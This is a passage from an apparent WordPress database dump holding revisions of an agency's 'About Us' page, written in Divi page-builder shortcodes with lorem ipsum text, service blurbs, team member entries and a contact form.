_builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-02.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_delay=\"200ms\" animation_intensity_zoom=\"20%\" animation_starting_opacity=\"100%\" locked=\"off\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_button button_url=\"#\" button_text=\"View All\" button_alignment=\"center\" _builder_version=\"3.16\" custom_button=\"on\" button_text_color=\"#f7f7f7\" button_border_width=\"4px\" button_border_color=\"#f7f7f7\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#fcd21d\" animation_style=\"flip\" animation_direction=\"right\" animation_intensity_flip=\"20%\" button_text_color_hover=\"#747d88\" button_border_color_hover=\"#747d88\" button_letter_spacing_hover=\"2px\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"on\" button_text_color__hover=\"#747d88\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"on\" button_border_color__hover=\"#747d88\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"on\" button_letter_spacing__hover=\"2px\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"on\" button_bg_color__hover=\"rgba(0,0,0,0)\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_button][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Contact Form Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_padding=\"110px||110px|\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"10%\" saved_tabs=\"all\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Let\'s Start Something new<br /><span style=\"color: #FFF;\">Say Hello!</span></h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#353740\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row admin_label=\"Contact Form\" _builder_version=\"3.25\" animation_style=\"fade\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_contact_form captcha=\"off\" submit_button_text=\"Send\" module_id=\"et_pb_contact_form_0\" _builder_version=\"3.23\" form_field_background_color=\"rgba(255,255,255,0)\" form_field_text_color=\"#353740\" form_field_font=\"Montserrat||||\" form_field_font_size=\"16px\" custom_button=\"on\" button_text_color=\"#ffffff\" button_border_width=\"5px\" button_border_color=\"#ffffff\" button_border_radius=\"100px\" button_letter_spacing=\"2px\" button_font=\"Montserrat|on||on|\" button_icon=\"%%36%%\" button_icon_color=\"#ffffff\" max_width=\"800px\" module_alignment=\"center\" animation_style=\"fade\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-1px\" box_shadow_color=\"rgba(0,0,0,0.18)\" form_background_color=\"rgba(255,255,255,0)\" button_text_color_hover=\"#ffffff\" button_bg_color_hover=\"rgba(0,0,0,0)\" button_border_color_hover=\"#ffffff\" button_letter_spacing_hover=\"2px\"][et_pb_contact_field field_id=\"Name\" field_title=\"Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Email\" field_title=\"Email Address\" field_type=\"email\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Company\" field_title=\"Company Name\" fullwidth_field=\"on\" _builder_version=\"3.16\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][et_pb_contact_field field_id=\"Message\" field_title=\"Message\" field_type=\"text\" fullwidth_field=\"on\" _builder_version=\"3.16\" custom_margin=\"||60px|\" custom_padding=\"|||\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"][/et_pb_contact_field][/et_pb_contact_form][/et_pb_column][/et_pb_row][/et_pb_section]','about-us','','inherit','closed','closed','','392-revision-v1','','','2020-08-07 18:13:10','2020-08-07 18:13:10','',392,'https://wthtest1.in8.cdn-alpha.com/2020/08/07/392-revision-v1/',0,'revision','',0),(521,1,'2020-08-07 18:15:10','2020-08-07 18:15:10','[et_pb_section fb_built=\"1\" admin_label=\"Page Header\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/circle-background-pattern.png\" custom_padding=\"67px|0px|67.1875px|0px|false|false\" animation_style=\"zoom\" animation_intensity_zoom=\"4%\"][et_pb_row _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"|||\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"3%\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.27.4\" text_font=\"||||||||\" header_font=\"Montserrat|700||on|||||dotted\" header_text_color=\"#353740\" header_font_size=\"60px\" header_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"|||\" animation_style=\"fade\" header_font_size_last_edited=\"off|desktop\" locked=\"off\"]<h1>About US</h1>\r[/et_pb_text][et_pb_divider show_divider=\"off\" disabled_on=\"on|on|off\" _builder_version=\"3.2\" max_width=\"120px\" animation_style=\"slide\" animation_direction=\"top\" animation_intensity_slide=\"30%\"][/et_pb_divider][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"About Us Section\" _builder_version=\"3.22\" background_image=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/business_01.jpg\" custom_margin=\"|5%||5%\" custom_margin_tablet=\"\" custom_margin_phone=\"|0px||0px\" custom_margin_last_edited=\"on|phone\" custom_padding=\"10%|||\" animation_style=\"zoom\" animation_direction=\"top\" animation_intensity_zoom=\"5%\" hover_enabled=\"0\" box_shadow_style=\"preset7\" box_shadow_horizontal=\"0px\" box_shadow_vertical=\"-200px\" box_shadow_color=\"#ffffff\"][et_pb_row column_structure=\"2_3,1_3\" admin_label=\"About Us Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"27px|0px|0px|0px\"][et_pb_column type=\"2_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_align=\"left\" header_2_font=\"Montserrat|700||on|||||\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_color=\"#f7f7f7\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"700px\" module_alignment=\"left\" custom_margin=\"|||\" custom_padding=\"10%|10%|10%|10%\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\" animation_starting_opacity=\"100%\" box_shadow_style=\"preset1\" box_shadow_vertical=\"15px\" box_shadow_blur=\"45px\" box_shadow_color=\"rgba(0,0,0,0.15)\" locked=\"off\"]<h2>Building the future</h2>\r\n<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis iste natus sit voluptatem accusantium doloremque laudantium totam rem aperiam, eaque ipsa quae ab.</p>\r\n<p>Illo inventore veritatis et quasi architecto beatae vitae dicta sunt explicabo. <span style=\"font-size: 16px;\">Nemo enim ipsam voluptatem quia voluptas sit aspernatur aut odit aut fugit, sed quia consequuntur magni dolores eos qui ratione voluptatem sequi nesciunt. Neque porro quisquam est, qui dolorem ipsum quia dolor sit amet, consectetur, adipisci velit, sed quia non numquam eius modi tempora incidunt ut labore et dolore magnam aliquam quaerat voluptatem.</span></p>\r[/et_pb_text][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Service Section\" _builder_version=\"3.22\" custom_margin=\"|||\" custom_padding=\"110px||110px|\"][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Creative\" use_icon=\"on\" font_icon=\"%%74%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>It is important for the creative process and our lives. A key component of visual marketing to let businesses succeed.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Media\" use_icon=\"on\" font_icon=\"%%103%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Strategically using new age media and creating a media mix effectively to evolve a sales funnel or brand awareness to engagement.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Digital\" use_icon=\"on\" font_icon=\"%%107%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Digital has emerged as one of the efficient media, there is no spill over with the help of professional targeting &amp; even individual targeting is possible.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" make_equal=\"on\" admin_label=\"Services\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" custom_padding=\"25px||25px|\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Business Strategy\" use_icon=\"on\" font_icon=\"%%101%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Gaining the competitive edge with Integrated Marketing Communications (IMC) or building product marketing strategy / Go to market strategy, We are in.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Web Design\" use_icon=\"on\" font_icon=\"%%106%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"100ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Online presence of any brand/product/service starts with a well defined and clearly communicated website. Website is the key and elementry step for any advertising campaign. So be ready to a bolder start.</span></p>\n[/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Design/Video/Photo\" use_icon=\"on\" font_icon=\"%%108%%\" icon_color=\"#d4b068\" use_icon_font_size=\"on\" icon_font_size=\"60px\" _builder_version=\"4.5.2\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" body_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_padding=\"30px|30px|30px|30px\" animation_style=\"zoom\" animation_delay=\"200ms\" hover_enabled=\"0\" border_width_all=\"0px\" border_color_all=\"#dddddd\" border_style_all=\"solid\" use_border_color=\"on\" border_color=\"#dddddd\"]<p><span>Design is not Art, Art is about the Artist, &amp; Design is about the user. Blending &amp; Balancing Art, Design, Copy &amp; Business Objective is what we do.</span></p>\n[/et_pb_blurb][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Quote Section\" _builder_version=\"4.5.2\" background_color=\"#d4b068\" custom_margin=\"|||\" custom_padding=\"110px|0px|110px|0px\" animation_style=\"zoom\" animation_direction=\"bottom\" animation_intensity_zoom=\"4%\" animation_starting_opacity=\"100%\" locked=\"off\"][et_pb_row admin_label=\"Quote\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Quote\" _builder_version=\"3.27.4\" text_font=\"||||||||\" text_text_color=\"#353740\" text_font_size=\"24px\" text_line_height=\"1.8em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"flip\" animation_direction=\"top\" animation_intensity_flip=\"20%\"]<p><span>Curabitur aliquam justo ex, ac varius sem facilisis a. Fusce ipsum enim, <strong>ultrices at ante sollicitudin</strong>, faucibus hendrenunc. Nullam tempor nulla eu imperdiet interdum.</span></p>\r[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Video Section\" _builder_version=\"4.5.2\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#d4b068\" background_color_gradient_end=\"#ffffff\" background_color_gradient_start_position=\"30%\" background_color_gradient_end_position=\"30%\" custom_padding=\"0px||110px|\"][et_pb_row admin_label=\"Video\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"0px|0px|0px|0px\" animation_direction=\"top\" box_shadow_style=\"preset1\" box_shadow_blur=\"77px\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_video src=\"https://www.youtube.com/watch?v=GQB6K7Dozms\" image_src=\"//i.ytimg.com/vi/GQB6K7Dozms/hqdefault.jpg\" thumbnail_overlay_color=\"rgba(0,0,0,0.6)\" _builder_version=\"4.5.2\" animation_direction=\"bottom\" box_shadow_style=\"preset5\" box_shadow_vertical=\"0px\" box_shadow_spread=\"20px\" box_shadow_color=\"#ffffff\"][/et_pb_video][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Team Member Section\" _builder_version=\"3.22\" custom_padding=\"110px||60px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#353740\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>Fearless Leaeders</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"3.27.4\" text_font=\"Montserrat||||\" text_text_color=\"#747d88\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\"]<p>Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</p>\r[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_padding=\"||15px|\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Eduard Ungureanu\" position=\"Project Manager\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-01.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Christina Foster\" position=\"Creative Director\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-06.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"100ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_team_member name=\"Jason Wardak\" position=\"Visual Media\" image_url=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/travel-portrait-04.jpg\" facebook_url=\"#\" twitter_url=\"#\" google_url=\"#\" linkedin_url=\"#\" _builder_version=\"3.0.83\" header_font=\"Montserrat|on|||\" header_text_color=\"#353740\" header_font_size=\"22px\" header_line_height=\"1.4em\" body_font=\"Montserrat||||\" body_text_color=\"#747d88\" body_font_size=\"16px\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" custom_margin=\"|||\" custom_padding=\"|||\" animation_style=\"fade\" animation_delay=\"200ms\" locked=\"off\"][/et_pb_team_member][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Other Recent Works Section\" _builder_version=\"3.22\" background_color=\"#353740\" custom_margin=\"|||\" custom_padding=\"60px||110px|\"][et_pb_row admin_label=\"Service Section Title\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" custom_margin=\"||40px|\" animation_style=\"fade\" animation_direction=\"top\" saved_tabs=\"all\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text admin_label=\"Title\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||||||\" text_text_color=\"#d4b068\" text_font_size=\"16px\" text_line_height=\"1.9em\" header_font=\"||||||||\" header_text_color=\"#d4b068\" header_2_font=\"Montserrat|700||on|||||\" header_2_text_color=\"#d4b068\" header_2_font_size=\"42px\" header_2_line_height=\"1.3em\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" animation_style=\"slide\" animation_direction=\"bottom\" animation_intensity_slide=\"4%\"]<h2>our Work</h2>\r[/et_pb_text][et_pb_text admin_label=\"Subtitle\" _builder_version=\"4.5.2\" text_font=\"Montserrat||||\" text_text_color=\"#f7f7f7\" text_font_size=\"16px\" text_line_height=\"1.8em\" header_font=\"||||||||\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" custom_margin=\"|||\" animation_style=\"slide\" animation_direction=\"bottom\" animation_delay=\"100ms\" animation_intensity_slide=\"4%\" hover_enabled=\"0\"]<p><span>Creative &amp; Effective work around practical marketing problems. Next update will have your creatives.</span></p>\n[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_3,1_3,1_3\" use_custom_gutter=\"on\" gutter_width=\"2\" admin_label=\"Other Recent Works Area\" _builder_version=\"3.25\" background_size=\"initial\" background_position=\"top_left\" background_repeat=\"repeat\" max_width=\"80%\" use_custom_width=\"on\" width_unit=\"off\"][et_pb_column type=\"1_3\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://wthtest1.in8.cdn-alpha.com/wp-content/uploads/2020/07/home-office-06.jpg\" show_in_lightbox=\"on\" use_overlay=\"on\" overlay_icon_color=\"#353740\" hover_overlay_color=\"#d4b068\" align_tablet=\"center\" align_phone=\"\" align_last_edited=\"on|desktop\" _builder_version=\"4.5.2\" animation_style=\"zoom\" animation_intensity_zoom=\"20%\" 